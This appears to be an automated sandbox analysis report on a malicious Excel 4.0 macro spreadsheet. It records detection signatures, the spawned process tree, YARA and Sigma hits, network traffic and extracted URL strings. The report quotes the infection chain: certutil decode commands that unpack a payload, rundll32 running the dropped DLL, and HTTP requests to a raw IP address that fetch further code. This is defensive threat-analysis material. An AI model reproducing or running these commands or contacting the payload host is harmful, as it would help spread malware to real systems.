Analysis Report Presentation_812525.xlsb

Overview

General Information

Sample Name: Presentation_812525.xlsb
Analysis ID: 342076
MD5: 4ddace9347c434a749eab40a211e6628
SHA1: c46b2b46bd274ad37bb5dbcea12bc8278f3b361e
SHA256: 796d5317aae9d27707694f5e2832fe990d1a7890ac53ec339b8f1233fe05a3a7

Detection

Hidden Macro 4.0
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Certutil Command
Uses certutil -decode
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 2996 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • certutil.exe (PID: 1488 cmdline: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2 MD5: D056DF596F6E02A36841E69872AEF7BD)
      • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • certutil.exe (PID: 204 cmdline: 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png MD5: D056DF596F6E02A36841E69872AEF7BD)
      • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 3704 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5400 cmdline: C:\ProgramData\ioq\ioq.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\Public\94101.png2
Rule: Msfpayloads_msf_9
Description: Metasploit Payloads - file msf.war - contents
Author: Florian Roth
Strings:
  • 0x0:$x1: 4d5a9000030000000

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2996, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In, ProcessId: 3704
Sigma detected: Suspicious Certutil Command
Source: Process started | Author: Florian Roth, juju4, keepwatch | Data: Command: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2, CommandLine: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\certutil.exe, NewProcessName: C:\Windows\SysWOW64\certutil.exe, OriginalFileName: C:\Windows\SysWOW64\certutil.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2996, ProcessCommandLine: 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2, ProcessId: 1488

Signature Overview


AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\Public\94101.png | ReversingLabs: Detection: 35%

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.3:49709 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\certutil.exe
Source: global traffic | DNS query: name: yahoo.com
Source: global traffic | TCP traffic: 192.168.2.3:49708 -> 74.6.143.26:443
Source: global traffic | TCP traffic: 192.168.2.3:49707 -> 172.104.129.156:80
Source: Joe Sandbox View | IP Address: 87.248.100.215
Source: Joe Sandbox View | ASN Name: LINODE-APLinodeLLCUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
  GET /campo/o/o HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 172.104.129.156
  Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 172.104.129.156
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10001000 EntryPoint,GetProcAddress,GetProcAddress,CreateDirectoryA,URLDownloadToFileA,
Source: global traffic | HTTP traffic detected:
  GET /campo/o/o HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 172.104.129.156
  Connection: Keep-Alive
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr | String found in binary or memory: <img src="https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c7=https%3A%2F%2Fwww.yahoo.com%2F&c5=2023538075&cv=2.0&cj=1&c14=-1" /> equals www.yahoo.com (Yahoo)
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr | String found in binary or memory: _comscore.push({"c1":"2","c2":"7241469","c5":"2023538075","c7":"https:\/\/www.yahoo.com\/","c14":-1}); equals www.yahoo.com (Yahoo)
Source: 9J0CLPJO.htm.6.dr | String found in binary or memory: <meta property="og:url" content="http://www.yahoo.com" /> equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: yahoo.com
Source: 94101.png.4.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 94101.png.4.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 9J0CLPJO.htm.6.dr | String found in binary or memory: http://modernizr.com/download/#-touch-cssclasses-teststyles-prefixes
Source: 94101.png.4.dr | String found in binary or memory: http://ocsp.sectigo.com0
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://management.azure.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://management.azure.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://messaging.office.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://officeapps.live.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://onedrive.live.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://outlook.office.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://outlook.office365.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://overview.mail.yahoo.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/cmp/version/3.0.3/cmp.js
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/react-wafer-subscription.SubscriptionReminder.atomic.ltr.cf0f4577b866e
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/react-wafer-subscription.custom.desktop.95c72e8740c6b97fbdb525937d8788
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-footer.FooterDesktop.atomic.ltr.0dabe32d96d30f44862f1509e65
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-header.HeaderDesktop.atomic.ltr.11873c103003ff0d3521375fdb9
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-header.MailPreview.atomic.ltr.1d101919d0fcd67e4832e47629894
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-header.custom.desktop.2ce65662738d6cd781c23fc340c7205c.css
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-hpsetpromo.HpSetBannerPromo.atomic.ltr.b7b5b76bb9c6987dd5d6
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-hpsetpromo.HpSetPromo.atomic.ltr.f9b4b86f21ef1f516530b45567
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-ntk.NTKDesktop.atomic.ltr.94b956089fc91c2f0a244928a927abc9.
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-ntk.custom.desktop.a69916e03ec8f658d9530295bab867ab.css
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-stream.StreamRelated.atomic.ltr.ce56954bd34343adfacf42baec3
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-stream.StreamWide.atomic.ltr.01431f1a963747bd42b012a4d15cd6
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-stream.custom.desktop.35b4e59342f8c72801c502afb5933cff.css
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-trending.Trending.atomic.ltr.3daf50b9757f01b0beab6adecd0b22
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-dialog.UserDialogLite.atomic.ltr.875d949b676096085b14b
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-intent.ContentPreference.atomic.ltr.bbf364e334d48eef59
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-intent.rollupDesktop.atomic.ltr.85ffd965befa53ddf87e9a
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/js/tdv2-wafer-header.custom.desktop.e0cc81c4de21a0aee644ee9285d79117.js
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/fp/js/tdv2-wafer-stream.custom.09abbb0c62340e97edf4c917b11628c4.js
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/scp/css/viewer.620320aff0540f575958990a24cd94ed.css
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/vzm/cs_1.1.3.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/vzm/perf-vitals_1.3.0.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-account-switch-1.1.2.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-autocomplete-1.19.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-beacon-1.3.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-bind-1.1.2.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-clipboard-copy-1.0.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-core-1.43.10.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-countdown-1.2.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-darla-1.0.21.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-drawer-1.0.10.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-dropdown-drawer-1.0.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-fetch-1.16.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-form-1.23.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-geolocation-1.2.9.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-image-1.1.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-menu-1.0.0.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-rapid-1.5.0.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-tabs-1.10.2.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-text-1.1.3.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/wf/wf-toggle-1.13.2.js
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/aaq/yc/js/iframe-1.0.26.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/cv/apiv2/default/20191018/EN_US_Yellow_300x250.png)
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/cv/apiv2/default/icons/favicon_y19_32x32_custom.svg
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/cv/apiv2/notifications/default-notif-img.png-168x168.png
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/cv/apiv2/social/images/yahoo_default_logo.png
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/nn/lib/metro/DailyFantasy_BN_Baseball_300x250-min.jpg)
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/nn/lib/metro/g/myy/fallback_grid_0.0.4.css
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/nn/lib/metro/g/sda/sda_flex_0.0.42.css
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/os/yc/css/bundle.c60a6d54.css
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/rq/darla/4-6-0/js/g-r-min.js
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/rz/l/favicon.ico
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/ss/rapid-3.53.17.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/BUky.irBpy2idMZJp.EufA--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/Emg04hx6q7x_kZo7E5_wgA--~B/Zmk9c3RyaW07aD0xOTM7cT05NTt3PTIyMDthcHB
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/GXmFDhVbGWyZvB.4VbCU7w--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/NJBDKYvT49dzIAW1aj4NFA--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmpString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/QotT_5MVAG9nDKsSCE8gVA--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/QzM21sk4Ljo_mk7ni0FtpQ--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/UFLqS.xvyj1podCMDQzrLA--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/avZ1m08tUBiHPBtv_CLfAw--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/l_eSHW.xbgQKdH8J9CAEbg--~B/Zmk9c3RyaW07aD0zODg7cT05NTt3PTcyMDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/osujQR2mchEHVk2pUiF4hQ--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: rundll32.exe, 00000006.00000002.250797242.0000000004B00000.00000004.00000001.sdmpString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/ukebcHBGNd6YYmQqOpTWGQ--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHB
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/wYmB0OdYXJ_idrKq3V9SYw--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c7=https%3A%2F%2Fwww.yahoo.com%2F&c5=2023538075&c
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://search.yahoo.com/opensearch.xml
Source: 94101.png.4.drString found in binary or memory: https://sectigo.com/CPS0D
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://settings.outlook.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://staging.cortana.ai
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://tasks.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.drString found in binary or memory: https://www.odwebp.svc.ms
